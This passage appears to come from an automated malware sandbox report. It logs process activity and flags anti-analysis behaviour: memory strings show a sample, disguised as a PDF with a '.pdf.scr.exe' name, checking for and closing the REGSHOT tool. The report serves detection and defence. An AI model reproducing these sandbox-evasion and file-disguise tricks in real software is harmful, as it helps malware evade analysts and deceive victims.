Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM autoit script

Source: Yara match	File source: 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: itugx.exe, 00000017.00000003.533363458.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.529712010.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534973802.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.536173123.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000002.542096662.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXESW
Source: itugx.exe, 00000015.00000003.505153695.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000002.512758146.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506047618.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.508004868.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506688814.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506384568.0000000001356000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXEQ
Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452549594.00000000014CB000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.450945660.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452340975.00000000014C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")#
Source: itugx.exe, 00000017.00000003.533363458.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.529712010.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534973802.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.536173123.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000002.542096662.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXED
Source: itugx.exe, 00000002.00000003.386800246.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.410540336.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400635217.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.468989814.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")<
Source: itugx.exe, 00000010.00000002.470477695.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")44V$
Source: itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN?8CJ
Source: itugx.exe, 00000019.00000003.565987603.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.565769789.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.563164824.0000000001959000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000002.569636959.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.567142794.000000000195C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXE=
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007390000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp, wscript.exe, 0000001B.00000002.537175124.0000025B9CBDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533357927.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533720665.0000025B9CBDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ORIGINALFILENAMEAUTORUNS.EXEL,
Source: wscript.exe, 0000001B.00000002.536000753.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533357927.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: LFILENAMEAUTORUNS.EXEL,
Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXEL~
Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.369716492.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412647234.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENXJ\
Source: itugx.exe, 00000005.00000003.452396525.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455207897.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.450945660.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451302859.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451585020.00000000014D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN-
Source: itugx.exe, 00000010.00000002.470505280.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.469351165.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465307309.00000000013D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467780564.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465193535.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.507346397.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509588017.00000000012C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
